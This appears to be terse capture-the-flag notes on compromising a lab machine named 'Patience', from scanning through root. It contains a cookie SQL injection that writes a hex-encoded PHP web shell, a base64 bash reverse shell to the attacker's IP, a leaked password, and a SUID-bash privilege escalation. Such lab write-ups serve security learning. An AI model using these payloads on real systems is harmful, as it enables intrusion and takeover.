Patience

10.10.174.233

â””â”€$ nmap -A -p- -T4 10.10.174.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 09:56 GMT
Nmap scan report for 10.10.174.233
Host is up (0.035s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:c9:dd:9b:db:95:9e:fd:19:a9:a6:0d:4c:43:9f:fa (RSA)
|   256 c3:fc:10:d8:78:47:7e:fb:89:cf:81:8b:6e:f1:0a:fd (ECDSA)
|_  256 27:68:ff:ef:c0:68:e2:49:75:59:34:f2:bd:f0:c9:20 (ED25519)
80/tcp    open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Patience
|_http-server-header: Apache/2.4.29 (Ubuntu)
46923/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.66 seconds

â””â”€$ feroxbuster --url http://10.10.174.233 --wordlist  /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -t 200
                                                                                                                      
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher ðŸ¤“                 ver: 2.11.0
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”¬â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
 ðŸŽ¯  Target Url            â”‚ http://10.10.174.233
 ðŸš€  Threads               â”‚ 200
 ðŸ“–  Wordlist              â”‚ /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
 ðŸ‘Œ  Status Codes          â”‚ All Status Codes!
 ðŸ’¥  Timeout (secs)        â”‚ 7
 ðŸ¦¡  User-Agent            â”‚ feroxbuster/2.11.0
 ðŸ’‰  Config File           â”‚ /etc/feroxbuster/ferox-config.toml
 ðŸ”Ž  Extract Links         â”‚ true
 ðŸ  HTTP methods          â”‚ [GET]
 ðŸ”ƒ  Recursion Depth       â”‚ 4
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
 ðŸ  Press [ENTER] to use the Scan Management Menuâ„¢
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        4l        7w       95c http://10.10.174.233/assets/css/dancing.css
301      GET        9l       28w      315c http://10.10.174.233/assets => http://10.10.174.233/assets/
200      GET      544l     1270w    47312c http://10.10.174.233/assets/fonts/DancingScript-Regular.otf
200      GET      985l     1816w    84827c http://10.10.174.233/assets/fonts/Alegreya-Regular.otf
200      GET       22l       57w      669c http://10.10.174.233/
200      GET        4l        6w       82c http://10.10.174.233/assets/css/alegreya.css
200      GET       47l       91w      733c http://10.10.174.233/assets/css/style.css
200      GET      335l     1978w   151691c http://10.10.174.233/assets/img/flag.jpg
200      GET        0l        0w  7576966c http://10.10.174.233/assets/img/patience.mp4
[####################] - 6m   1185265/1185265 0s      found:9       errors:95     
[####################] - 6m   1185240/1185240 3054/s  http://10.10.174.233/ 
[####################] - 0s   1185240/1185240 9406667/s http://10.10.174.233/assets/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 7s   1185240/1185240 168526/s http://10.10.174.233/assets/img/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s   1185240/1185240 6372258/s http://10.10.174.233/assets/fonts/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 6s   1185240/1185240 184847/s http://10.10.174.233/assets/css/ => Directory listing (add --scan-dir-listings to scan) 

Burp request : 


GET /assets/img/patience.mp4 HTTP/1.1
Host: 10.10.174.233
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: */*
Referer: http://10.10.174.233/
Cookie: id=e8457caa62356709222a03e113b98b00 => interesting
Range: bytes=0-
Connection: keep-

â””â”€$ curl http://10.10.183.77 --cookie "id=f702677dcc9a1585ebfa2dab8bbefd7e' INTO OUTFILE '/var/www/html/test7.txt' LINES TERMINATED BY 0x3c3f3d207368656c6c5f6578656328245f4745545b2263225d293b3f3e0a#" -vvv


â””â”€$ curl --location 'http://patience/test3.php?c=echo%20c2ggLWkgPiYgL2Rldi90Y3AvMTAuMjEuNzguMTQyLzQ0NDQgMD4mMQ==%20|%20base64%20-d%20|%20bash' -vvv

cat /home/cookie-monster/cookie_analysis | grep cookie : 

Sep  5 20:53:04 staging-server sshd[39218]: Connection closed by invalid user cookie-monster Giv3_Me_M04r_Co0Ki3s 192.168.1.142 port 45624 [preauth]

OS: Linux version 4.15.0-196-generic (buildd@lcy02-amd64-018) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #207-Ubuntu SMP Thu Oct 27 21:24:58 UTC 2022
User & Groups: uid=1000(cookie-monster) gid=1000(cookie-monster) groups=1000(cookie-monster)
Hostname: cookies
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)

...

ssh -L 3001:localhost:3000 cookie-monster@10.10.129.196

metasploit use rcs git hook gitea

got a shell as git sudo -l : all perms => sudo su

shared directory /data/gitea and /gitea/gitea

on the first machine :

cp /bin/bash 

on the second : 

chown root:root bash

chmod +s bash

on the first :

./bash -p

got a root shell

cat /root/root.txt : EPI{C_1s_f0R_C00K135_tH4T_S_G00d_3n0UgH_F0r_M3}
